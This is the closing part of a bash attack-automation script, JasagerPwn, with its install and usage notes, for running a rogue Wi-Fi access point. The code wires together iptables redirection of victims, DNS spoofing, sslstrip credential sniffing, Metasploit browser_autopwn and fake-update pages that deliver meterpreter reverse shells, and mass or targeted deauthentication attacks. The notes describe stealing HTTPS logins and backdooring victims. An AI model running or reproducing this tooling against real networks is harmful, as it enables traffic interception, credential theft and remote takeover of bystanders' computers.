xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" &
fakeupdate="0"
sleep 3
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
if [ $wasSniffing != "0" ]; then
sslstrip
fi
echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"
break
;;
M|m|Menu|menu|2)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
B|b|browserpwn|browserPwn|3)
if [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict."
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
elif [ $browserpwn -eq 0 ]; then
if [ $autoMetScript -eq 1 ]; then metScript; fi
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" &
#xterm -geometry 110x42+464-38 -bg black -fg green -T "[leg3nd-BrowserPwn] v$version - WebServer" -e "msfcli auxiliary/server/browser_autopwn LHOST=$ourIP SRVPORT=80 SRVHOST=$ourIP URIPATH=/ E" &
sleep 25
echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
ipTableRedirect
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
#iptables --table nat --append PREROUTING --in-interface $FONIFACE
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $ourIP:80..."
browserpwn="1"
fi
while true
do
if [ $fakeupdate -eq 1 ]; then break; fi
if [ $javaATK -eq 1 ]; then break; fi
echo
echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m"
echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
read -e USR_CHOICE2
#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2
case $USR_CHOICE2 in
S|s|Stop|stop|1)
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
IPTABLES
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
browserpwn="0"
sleep 3
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
if [ $wasSniffing != "0" ]; then
sslstrip
fi
echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!"
echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!"
break
;;
M|m|Menu|menu|2)
echo -e "\e[01;33m[!]\e[00m Please kill Browser AutoPwn jobs in metasploit, or close it."
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
D|d|deauth|Deauth|DeAuth|5)
attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
while true
do
echo
echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m"
echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth"
echo -e "\e[01;33m[!]\e[00m [4][K]ill [5][M]ain menu"
#read -r -p "[?] Please enter [ A | D | S | K | M ]: " USR_CHOICE3
echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "
read -e USR_CHOICE3
case $USR_CHOICE3 in
A|a|airodrop|Airodrop|1)
if [ -e "/usr/bin/airdrop-ng" ]; then
if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi
sleep 2
xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" &
AIRDUMPID=`echo $!`
sleep 10
xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" &
AIRDROPID=`echo $!`
else
echo
echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this."
echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/airdrop-ng and run install.py."
fi
;;
D|d|deauth|DeAuth|2)
#if [ ! $ATKcheck ]; then
# xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" &
# sleep 4
#fi
xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" &
DEAUTHPID=`echo $!`
;;
S|s|single|Single|3)
#if [ ! $ATKcheck ]; then
# xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "#airmon-ng start $WIFACE" &
# sleep 4
#fi
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" &
xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" &
airID=`echo $!`
echo
read -r -p "[?] Enter the target APs BSSID: " TBSSID
kill $airID
read -r -p "[?] Do You want a specific client? [ Y | N ]: " DMODE
case $DMODE in
y|Y|Yes|yes|1)
xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" &
echo
read -r -p "[?] Enter the target Client MAC: " CMAC
xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" &
;;
n|N|No|no|2)
xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" &
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
#take in information from dump for aireplay
;;
K|k|kill|Kill|4)
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" &
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" &
;;
M|m|menu|Menu|5)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
N|n|Network|network|net|6)
while true
do
echo
echo -e "\e[01;33m[MODE][==================-Network Settings-====================][!]\e[00m"
echo -e "\e[01;33m[!]\e[00m [1][I]nterface [2][D]eAuth Config"
echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain menu"
echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "
read -e USR_CHOICE99
case $USR_CHOICE99 in
I|i|interface|Interface|1)
read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: " USR_CHOICE98
case $USR_CHOICE98 in
#Connecting to WIFI
y|Y|Yes|yes|1)
xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh"
#kill $dnsID2 >/dev/null 2>&1
echo
read -p "[!] Connect to WiFi Network THEN Press [Enter] .."
echo
echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"
read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE
IFACE=`echo $NEWIFACE`
if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
IPTABLES
elif [ $sniffing -eq 1 ]; then
ipTableRedirect
elif [ $browserpwn -eq 1 ]; then
ipTableRedirect
elif [ $fakeupdate -eq 1 ]; then
ipTableRedirect
elif [ $javaATK -eq 1 ]; then
ipTableRedirect
fi
while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 &
sleep 2 && dnsID2=`echo $!`
wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`
echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf
;;
#Connecting to HARDWIRE
n|N|No|no|2)
#kill $dnsID2 >/dev/null 2>&1
xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh"
echo
echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"
read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE
IFACE=`echo $NEWIFACE`
if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
IPTABLES
elif [ $sniffing -eq 1 ]; then
ipTableRedirect
elif [ $browserpwn -eq 1 ]; then
ipTableRedirect
elif [ $fakeupdate -eq 1 ]; then
ipTableRedirect
elif [ $javaATK -eq 1 ]; then
ipTableRedirect
fi
#while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 &
echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
chmod +x /tmp/resolv.sh
xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
sleep 2 && dnsID2=`echo $!`
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
;;
D|d|deauth|DeAuth|2)
xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf"
echo
echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes."
;;
R|r|refresh|Refresh|3)
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE"
sleep 3
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" &
#while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &> /dev/null &
echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
chmod +x /tmp/resolv.sh
xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
sleep 2 && dnsID2=`echo $!`
;;
M|m|menu|Menu|4)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
X|x|exit|Exit|7)
cleanup
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
cleanup
#######################################################################################
INSTALL_HOWTO:
================================
JasagerPwn Attack Vector Script
--------------------------------
leg3nd @ info-s3curity.com
--------------------------------
Bugs @ hak5 forums or via email
dgriffin831@gmail.com
--------------------------------
================================
General Description: This is a fairly basic bash script used to automate multiple attack vectors
using Jasager/Karma on a Fon router. The script is designed to be error coded and seamless in terms
of switching access and attacks at will. I have found it to be extremely useful in pentest scenarios
becuase of all the time saved doing basic setup for attacks manually. Enjoy at your own risk!
-This script is going to assume your using backtrack 4 with /pentest/, if you
have it somewhere else just adjust it accordingly.
The following dependencies are required for full functionality of the script...
Dependencies: PHP5, Apache2, Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite,
DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection.
Step 1: Insure you have everything needed.
------------------------------------------
apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 twisted-web libapache2-mod-php5
cd /pentest/exploits/SET/ && python install.py
cd /pentest/wireless/airdrop-ng/ && python install.py
- Make sure SSLstrip is installed with the same method, I think it is by default in bt4.
If it isnt working this is how to install it:
cd /pentest/
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar xvf sslstrip-0.7.tar.gz
cd sslstrip-0.7/
chmod +x setup.py
python setup.py
Step 2: Adjust the script variables.
------------------------------------
- Open up the script in your favorite editor and look over all the variables and their comments.
- If your not using bt4 you may need to adjust the SET and MSF diretories.
- Set up the correct interfaces according to your setup.
- Set the 'fonIP' variable to an available IP on the FONs subnet.
- I recommend setting up the 'metScript' function to automaticlly do what you need on your victims, by
default this set to "0" and uses reverse_tcp_dns backdoors.
Step 3: Setup FON
------------------
- We need to remove DHCP on the fon becuase we will be running it from the computer instead.
- If your using some other DHCP service you may also need to disable that.
/etc/init.d/dnsmasq stop
/etc/init.d/dnsmasq disable
Thats it! If everything is done correctly and assuming the system has the correct versions of python and ruby,
you should be good to go.
=======================
Included Attacks
=======================
SSLstrip/Sniffing: By default it will always be using dsniff, driftnet, and urlsnarf becuase its seemless to the users anyways.
The attack SSLstrip/sniffing will start stealing SSL certs from https:// websites as they browse, it works on
around 95% of SSL websites, These logs will be followed, saved, and parsed for login credentials. SSLstrip is
set to use port 10000 and will be paused when using other attacks.
FakeUpdate(by g0tmi1k): Redirect WLAN to fake microsoft update page hosted in apache with a generated payload with meterpreter
reverse_tcp. This currently only has download support for MS clients.
BrowserPwn: This will redirect WLAN to a metasploit browser_autopwn server, This is fairly nosiy and will throw out any exploit
thats availble for that browser to gain a reverse_tcp meterpreter session. This works on any OS.
JavaPwn: This will redirect WLAN to a SET generated java page with a reverse_tcp meterpreter java applet, It asks to 'run' the
Applet while on a cloned/modified version of the Java download page. Cloned pages include google and a fake Sun Java page.
Keep in mind that cloned pages need to have images,scripts, and css hosted LOCALLY to work.
-This attack vector is included with 2 templates in the script (google and a java required page).
-KEEP IN MIND - When combining the "clone website" feature of SET with these IPtables command, the template will be
obscured becuase images cannot be pulled from the remote server. I manually edited the sites to work.
DeAuth: There are a few different de-authorization attacks included in the script.
-The most effective being airdrop-ng, this is a client and rule based mass deauth tool, It is set to deauth every AP around
you expect your AP and your wireless card (so you can tunnel via wireless).
-I normally keep a terminal open in /tmp (where i create the config files in the start of the script), and you may
manually edit the deauth configurations as needed. It will not reset until the whole script restarts.
-"Mass DeAuth" is a rather simple bash script which uses iwscan to gather APs informations and sends out deauth packets via
'aireplay-ng -0', but this is sent to the AP (broadcast) itself, and not client based.
-Single DeAuth is just a normal deauth attack, This is if you wanted to be a little stealthy and pick up specific clients.